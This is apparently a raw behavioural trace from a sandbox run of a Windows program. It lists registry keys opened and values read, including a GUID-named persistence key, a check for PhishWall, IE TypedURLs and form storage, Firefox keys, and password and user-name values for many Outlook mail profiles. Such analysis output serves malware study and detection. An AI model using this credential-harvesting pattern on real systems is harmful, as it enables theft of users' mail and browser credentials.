Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 - True 2
Fn
Open Key HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\SecureBrain\PhishWall - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 - True 2
Fn
Open Key HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 - True 2
Fn
Open Key HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530\Run - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Account Manager - True 2
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts - False 63
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings - False 63
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - False 63
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook - False 63
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook - False 24
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\03fea8ae12202041b643a9691e5b323c - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab - True 63
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 - True 63
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a - True 63
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 - True 63
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5b59a51e8457564ab95b73c6194dc831 - True 63
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\626dbd3f36ef4b4b9263a867695919ec - True 63
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 - True 63
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 - True 63
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - True 63
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 - True 57
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 - True 6
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 - True 32
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 - True 63
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 - True 63
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 - True 63
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e - True 63
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 - True 63
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2 - False 63
Fn
Open Key HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Mozilla - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox\TaskBarIDs - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\53.0.3 (x86 en-GB) - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\53.0.3 (x86 en-GB)\Main - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\53.0.3 (x86 en-GB)\Uninstall - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 53.0.3 - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 53.0.3\bin - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 53.0.3\extensions - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530\Files - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 - True 4
Fn
Read Value HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 value_name = Ini, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 value_name = Install, type = REG_BINARY True 2
Fn
Data
Read Value HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 value_name = Client, type = REG_BINARY True 1
Fn
Data
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = ProductID, data = 48 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = ProductName, data = 87 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = CurrentVersion, data = 54 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = InstallDate, data = 65 True 1
Fn
Read Value HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 value_name = {111F6A44-3C4D-6BC7-CED5-30CFE2D96473}, type = REG_NONE False 1
Fn
Read Value TreatAs type = REG_NONE False 27
Fn
Read Value - data = 0 True 49
Fn
Read Value - data = PSFactoryBuffer True 9
Fn
Read Value - value_name = InprocServer32 False 23
Fn
Read Value - data = C:\Windows\System32\BitsProxy.dll True 5
Fn
Read Value - value_name = ThreadingModel, data = Both True 14
Fn
Read Value InprocHandler32 - False 27
Fn
Read Value InprocHandler - False 27
Fn
Read Value - value_name = ThreadingModel, data = both True 2
Fn
Read Value - data = psfactorybuffer True 1
Fn
Read Value - value_name = ActivationType, type = REG_NONE True 4
Fn
Read Value - value_name = Threading, type = REG_NONE True 2
Fn
Read Value - value_name = TrustLevel, type = REG_NONE True 4
Fn
Read Value - value_name = ActivateAsUser, type = REG_NONE False 4
Fn
Read Value - data = Network List Manager True 1
Fn
Read Value - value_name = Threading, type = REG_NONE False 2
Fn
Read Value - value_name = IdentityType, type = REG_NONE True 1
Fn
Read Value - value_name = Permissions, type = REG_NONE True 1
Fn
Read Value - value_name = ServerType, type = REG_NONE True 1
Fn
Read Value - data = C:\Windows\System32\\Windows.StateRepository.dll True 1
Fn
Read Value - - False 1
Fn
Read Value - data = C:\Windows\system32\windowscodecs.dll True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows value_name = DisplayVersion, type = REG_NONE False 59
Fn
Read Value HKEY_CURRENT_USER\Control Panel\Desktop value_name = PaintDesktopVersion, type = REG_NONE True 59
Fn
Read Value - data = ShellItem Shell Namespace helper True 1
Fn
Read Value - data = C:\Windows\system32\windows.storage.dll True 3
Fn
Read Value - data = Shared Task Scheduler True 1
Fn
Read Value - value_name = ThreadingModel, data = Apartment True 7
Fn
Read Value - data = Immersive Shell True 1
Fn
Read Value - data = C:\Windows\System32\ActXPrxy.dll True 2
Fn
Read Value HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 value_name = {36CFCEF2-1DFD-D85B-57CA-A18C7B9E6580}, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Account Manager value_name = Outlook, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = SMTP Email Address False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = SMTP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = POP3 Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = POP3 User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = SMTP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = NNTP Email Address False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = NNTP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = NNTP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = IMAP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = IMAP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = Email False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = HTTP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = HTTP Server URL False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = POP3 User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = IMAP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = HTTPMail User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = HTTPMail Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = SMTP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = POP3 Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = IMAP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = NNTP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = HTTPMail Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = SMTP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = POP3 Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = IMAP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = NNTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = HTTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = SMTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = POP3 Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = SMTP Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = IMAP Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = SMTP Email Address False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = SMTP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = POP3 Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = POP3 User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = SMTP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = NNTP Email Address False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = NNTP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = NNTP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = IMAP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = IMAP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = Email False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = HTTP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = HTTP Server URL False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = POP3 User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = IMAP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = HTTPMail User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = HTTPMail Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = SMTP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = POP3 Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = IMAP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = NNTP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = HTTPMail Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = SMTP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = POP3 Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = IMAP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = NNTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = HTTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = SMTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = POP3 Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = SMTP Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = IMAP Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = SMTP Email Address False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = SMTP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = POP3 Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = POP3 User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = SMTP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = NNTP Email Address False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = NNTP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = NNTP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = IMAP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = IMAP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = Email False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = HTTP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = HTTP Server URL False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = POP3 User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = IMAP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = HTTPMail User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = HTTPMail Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = SMTP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = POP3 Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = IMAP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = NNTP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = HTTPMail Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = SMTP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = POP3 Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = IMAP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = NNTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = HTTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = SMTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = POP3 Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = SMTP Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = IMAP Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = SMTP Email Address False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = SMTP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = POP3 Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = POP3 User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = SMTP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = NNTP Email Address False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = NNTP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = NNTP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = IMAP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = IMAP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = Email False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = HTTP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = HTTP Server URL False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = POP3 User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = IMAP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = HTTPMail User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = HTTPMail Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = SMTP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = POP3 Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = IMAP Password2 False 2
Fn
